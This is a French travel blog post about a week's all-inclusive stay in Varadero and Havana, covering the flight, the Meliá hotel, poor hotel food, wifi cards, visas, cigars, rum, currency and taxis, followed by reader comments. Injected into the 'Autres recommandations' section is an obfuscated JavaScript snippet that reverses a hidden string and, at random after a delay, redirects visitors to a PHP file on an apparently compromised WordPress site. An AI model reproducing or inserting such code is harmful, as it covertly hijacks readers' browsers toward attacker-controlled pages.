Cuba en fait rêver plus d’un. Ses plages paradisiaques, son climat de rêve et ses couleurs nous ont donné l’envie d’y aller. On partage avec vous notre voyage.
Nous avons passé une semaine de détente et de farniente à Cuba à la recherche des plus belles plages de Varadero et des vestiges Coloniaux de la Havane. N’oubliez pas de faire un tour sur notre page Instagram @JerryPeps
Détail du Séjour
Nous avons réservé notre voyage avec DominicanaTours à partir de Madrid pour une semaine en All Inclusive à Varadero. (Si vous êtes au Maroc, vous devez acheter le billet Casablanca/Madrid à vos frais)
L’offre comprenait:
- L’hôtel (all inclusive). Nous avons choisi l’hôtel Mélia Varadero 5 étoiles.
- Le vol Aller/Retour Madrid – La Havane (comptez 9h30 de vol)
- Le transfert vers Hôtel à Varadero (comptez 3 heures de route entre La Havane et Varadero)
La compagnie Evelop Air est sympa. Attention, ne vous attendez pas un service à la Qatar Airways. Les écouteurs sont payant (4 euros). Pour les repas, sur 9h30 de vol, nous avons eu un plat chaud et un petit snack, en d’autres termes si vous êtes réveillé tout le vol, vous aurez vraiment faim. Si vous avez soif entre temps, vous devrez acheter les chips et les boissons sur place. Achetez vos sandwichs et eau à l’aéroport sinon vous serez ruinés. Je vous aurez prévenue.
Hôtel Mélia Varadero
Les hôtels 5 étoiles à Cuba sont plutôt des hôtels 5 étoiles des années 60, embargo oblige. Néanmoins, la qualité des lits et des oreillers est parfaite, la vue mer est magnifique et la plage est tout aussi belle que sur les photos.
L’hôtel dispose de l’un des plus beaux golfs de Varadero à 2 min à pied et d’une multitude de services tels que la location de voitures et de moto, l’organisation de day Trip à La Havane, Excursion à Cayo Blanco … À une minute à pied, se trouve le centre commercial Plaza Américas le mieux fourni de Varadero. Un tour au super marché en vaut la peine, on comprend vite la signification du communisme.
Seul bémol de tout le voyage, la nourriture de l’hôtel. Avant notre départ, nous avions reçu des avis négatifs concernant la nourriture dans les hôtels All inclusive à Cuba, mais nous ne nous attendions pas à vivre une telle expérience. Les jus qui étaient censés être naturels étaient mélangés à une tonne d’eau, résultat pas goût.
Malgré la nourriture, nous avons séjourné dans un cadre idyllique et ce n’est sûrement pas la nourriture qui nous empêchera de revisiter Cuba.
Pour info, Internet est très rare à Cuba. D’ailleurs cela ne fait que 2 ans qu’ils ont le wifi. Pour se connecter, il suffit d’acheter des cartes wifi d’une heure dans les commerces (il vous faudra votre passeport pour l’achat). 1 heure de wifi coûte 1 CUC en général, mais 2 CUC dans les hôtels.
Visa
- Si vous achetez un pack (vol + hôtels + transfert), le visa est compris et fourni par le tour opérateur. Lors de l’enregistrement à l’aéroport, le tour opérateur vous fourni le visa d’entrée à Cuba.
- Si vous voyagez par vos propres moyens, il faudra demander le visa au préalable sur internet et payer pour sa livraison au Maroc par DHL (très cher) ou demander une livraison en France ou en Espagne chez une connaissance qui pourra vous le donner en main propre lors de son passage au Maroc.
Autres recommandations
$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif;”>:
- Cuba n’est pas un pays dangereux. Je pense qu’il y a moins d’agressions qu’à Paris ou Casablanca ;p
Par contre pas mal de vols. Sans agressions. Des pickpockets. - Ne jamais boire de l’eau du robinet (mais pas au point de sortir les glaçons de son verre)
- Ne jamais acheter des cigares à des mecs dans la rue, sauf si vous voulez les fumer sur place, ces cigares sont des cigares volés et la douane vous les confisquera à l’aéroport.
Acheter les cigares dans des magasins spécialisés et les prendre dans les bagages à main avec le ticket de caisse (ça peut éviter qu’ils ne vous appellent pour aller leur ouvrir ta valise en soute) - Acheter du rhum !! Moitié prix par rapport aux prix en Europe. Je vous conseille le “Havana Club 3 ans” pour le rhum blanc; et le “Havana Club 7 ans” ou le “Santiago Anejo” pour le rhum brun.
- Il y a deux monnaies à Cuba: le peso cubain et le CUC.
1CUC=20 peso cubain (mais ce change varie) et 1CUC=0.80euro
Le peso cubain ne vous servira à rien. Sauf si vous aller faire un tour dans un marché pour acheter des fruits. - Les taxis ne sont pas cher, mais vérifiez que le compteur marche, dire la destination avant de monter et si possible demander une estimation du prix, mais surtout exigez le compteur.
- Pourboires très appréciés.
- Si vous allez visiter le ChinaTown de la Havane, ne pas manger dans ses restos !! Gros pièges à touristes…
N’hésitez pas à nous laisser toutes autres questions concernant notre séjour à Cuba en commentaire.
Je suis en train d’écrire un article sur La Havane – Que faire en une journée à la Havane?
Suivez-nous sur notre blog, notre page Facebook et notre page Instagram.
Bonjour je pars bientôt à cuba et je me demandai ce que ces offres all inclusive proposent en terme d’activités et aussi par rapport à la location de voiture ancienne est ce que vous l’avez loué à l’avance ou sur place et à combien ? Merci
Répondre
Bonjour, dans les ALL inclusive il y a seulement les activités sportives de l’hôtel (tennis, volley, tir à l’arc, Pédalo, catamaran pour un tour de 20min…) et animation de l’hôtel.
Pour la voiture, tous les hôtels les loue. Nous avons contacté un guide qui nous a été recommandé et qui s’est chargé de la voiture et son chauffeur.
Répondre
Bonjour, nous partons a cuba prochainement, svp pour la nourriture qu’est ce que vous avez fait. Merci
Répondre
Bonjour, nous avons mangé à l’hôtel mais c’était bof.
Répondre